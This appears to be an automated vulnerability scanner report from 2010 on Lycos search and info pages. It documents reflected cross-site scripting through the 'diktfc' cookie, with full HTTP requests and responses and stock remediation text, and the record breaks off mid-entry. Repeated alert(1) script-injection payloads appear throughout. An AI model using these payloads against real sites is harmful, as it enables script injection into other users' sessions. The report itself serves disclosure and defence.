GET /tos.php HTTP/1.1 Host: info.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772"%3balert(1)//8a55a70c6c9; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:04 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772";alert(1)//8a55a70c6c9.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e7"><script>alert(1)</script>527175ce7c7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos.php HTTP/1.1 Host: info.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53348"><script>alert(1)</script>06140d2ed1c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?tab=people HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93dbb"%3balert(1)//50c42141ad8 was submitted in the diktfc cookie. This input was echoed as 93dbb";alert(1)//50c42141ad8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=people HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb"%3balert(1)//50c42141ad8; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19426
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77ec"><script>alert(1)</script>002fe144ca0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd2fc"%3balert(1)//805be358977 was submitted in the diktfc cookie. This input was echoed as fd2fc";alert(1)//805be358977 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc"%3balert(1)//805be358977; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19417
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af04"><script>alert(1)</script>ad74ead34bd was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /frontdoor HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2a6"%3balert(1)//a9d857a500e was submitted in the diktfc cookie. This input was echoed as ef2a6";alert(1)//a9d857a500e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /frontdoor HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6"%3balert(1)//a9d857a500e; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:34:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19414
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea545"><script>alert(1)</script>6004c137ca9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d566a"%3balert(1)//48efc52aeab was submitted in the diktfc cookie. This input was echoed as d566a";alert(1)//48efc52aeab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a"%3balert(1)//48efc52aeab; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19414
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82a1"%3balert(1)//5ed61034d11 was submitted in the diktfc cookie. This input was echoed as c82a1";alert(1)//5ed61034d11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1"%3balert(1)//5ed61034d11; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:25 GMT; path=/ Set-Cookie: LYCOS_SEARCH=587lfmk59vbrkvafqo83kut8a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19195
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a339"><script>alert(1)</script>9a100a5a9b2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:24 GMT; path=/ Set-Cookie: LYCOS_SEARCH=ncif4d92tcnpmqlnmaatquk415; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6059"><script>alert(1)</script>3164d47745a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:35:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:08 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a0b"%3balert(1)//178a733ee57 was submitted in the diktfc cookie. This input was echoed as 36a0b";alert(1)//178a733ee57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b"%3balert(1)//178a733ee57; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:35:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:09 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17147
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599d1"><script>alert(1)</script>8a2ede2f521 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
